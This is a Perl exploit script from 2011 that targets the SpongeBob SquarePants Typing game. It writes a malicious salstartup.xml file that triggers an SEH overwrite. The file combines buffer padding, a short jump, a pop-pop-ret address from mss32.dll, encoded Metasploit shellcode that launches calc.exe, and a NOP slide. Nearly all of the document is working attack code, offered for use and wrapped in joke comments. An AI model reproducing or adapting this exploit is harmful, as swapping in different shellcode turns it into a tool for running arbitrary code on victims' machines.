# SEH overwrite exploit for SpongeBob SquarePants Typing # from The Learning Company (http://goo.gl/1EHaD) # Date: May 4th 2011 # Author: Infant Overflow # # .-. # ) ( # - - # |_____| # / \ # | ~~~ | # | ~~~~~ | # | ~~~~~ | # | ~~~~~ | # \_______/ # # Fresh out the womb laying the smack down on SpongeBob # I like my sploits like I like my milk... fresh # # Shoutz to Pops, Elmo, my girl Dora, Handy M, and Thomas the Mother f'n Train # # Tested on WinXP SP3 my $diaper = "A" x 1024; # Everyone needs some padding my $jumprope = "\xeb\x06\x90\x90"; # jump 6 my $pacifier = pack('V',0x2110234D); # pop pop ret from mss32.dll <-- no /SAFESEH sucks like my pacifier! # windows/exec - 247 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=process, CMD=c:\windows\system32\calc.exe my $shellcode = "\xd9\xf6\xba\x24\xb5\x20\x67\xd9\x74\x24\xf4\x5f\x2b\xc9" . "\xb1\x38\x31\x57\x17\x03\x57\x17\x83\xcb\x49\xc2\x92\xef" . "\x5a\x8a\x5d\x0f\x9b\xed\xd4\xea\xaa\x3f\x82\x7f\x9e\x8f" . "\xc0\x2d\x13\x7b\x84\xc5\xa0\x09\x01\xea\x01\xa7\x77\xc5" . "\x92\x09\xb8\x89\x51\x0b\x44\xd3\x85\xeb\x75\x1c\xd8\xea" . "\xb2\x40\x13\xbe\x6b\x0f\x86\x2f\x1f\x4d\x1b\x51\xcf\xda" . "\x23\x29\x6a\x1c\xd7\x83\x75\x4c\x48\x9f\x3e\x74\xe2\xc7" . "\x9e\x85\x27\x14\xe2\xcc\x4c\xef\x90\xcf\x84\x21\x58\xfe" . "\xe8\xee\x67\xcf\xe4\xef\xa0\xf7\x16\x9a\xda\x04\xaa\x9d" . "\x18\x77\x70\x2b\xbd\xdf\xf3\x8b\x65\xde\xd0\x4a\xed\xec" . "\x9d\x19\xa9\xf0\x20\xcd\xc1\x0c\xa8\xf0\x05\x85\xea\xd6" . "\x81\xce\xa9\x77\x93\xaa\x1c\x87\xc3\x12\xc0\x2d\x8f\xb0" . "\x15\x57\xd2\xde\xe8\xd5\x68\xa7\xeb\xe5\x72\x87\x83\xd4" . "\xf9\x48\xd3\xe8\x2b\x2d\x2b\xa3\x76\x07\xa4\x6a\xe3\x1a" . "\xa9\x8c\xd9\x58\xd4\x0e\xe8\x20\x23\x0e\x99\x25\x6f\x88" . "\x71\x57\xe0\x7d\x76\xc4\x01\x54\x15\xd0\xa1\x20\xb3\x4a" . "\x3e\xa0\x34\xe1\xe2\x4d\xc2\x76\x6f\xd7\x59\x4b\xbd\x4b" . "\xc1\xca\xad\x10\x2b\x69\x56\xb2\x33"; my $rattle =' "'; my $playpen = '" "SpongeBob SquarePants Typing" 7-10 1000 "E:\INSTALL\ACROBAT\Ver50\Acrobat Reader 5 Installer.exe" yes 4To6 default E:\TLC\383167-CD "SpongeBob SquarePants Typing" salstartup.rsc all scene 9100 all toon 0 0 9100 1 all fob play disk1 "C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\SPT.exe" wait 461 60 9124 all fob extension "C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\User's Guide.pdf" wait 543 158 9126 all fob uninstall C:\WINDOWS\TLCUninstall.exe -l "C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\Uninstall.xml" exit 514 373 9125 all fob link http://redirect.expressit.com/redirect.asp?resku=383167&action_id=Launcher wait 538 263 375 9130 all fob install "C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\ereg\ereg32.exe" wait 522 324 9129 all fob link disk1 startup:startup/BrandingPage wait 543 207 9128 all toon 5000 all fob install disk1 E:\SailorificStuff\sbscreen_setup.exe wait 546 188 5054 all fob link startup:startup/screen 537 263 5055 yes pentium 266 warn "266 MHz Pentium or faster is recommended." no yes yes no yes yes warn "You operating system is not supported. Play at your own risk!" 100 ignore "There is not enough hard disk space available to play!" 64 warn "There is not enough RAM available to play!" 64 warn You are low on memory! 800 600 16 fail "Your display is not capable of 800 x 600 16-bit, thousands of colors." fail "WAVE driver is not available." ppc 233 warn "233 MHz Powerpc or faster is recommended." 0860 fail "You must run System 8.6 or above!" 1004 fail "You must run OSX 10.04 or above!" 100 ignore "There is not enough hard disk space available to play!" 64 warn "There is not enough RAM available to play!" 0 warn 16 warn "Your display is not capable of 16-bit, thousands of colors." ignore ignore '; my $slide = "\x90" x 1000; open(myfile,'>salstartup.xml'); print myfile $rattle.$diaper.$jumprope.$pacifier.$shellcode.$slide.$playpen;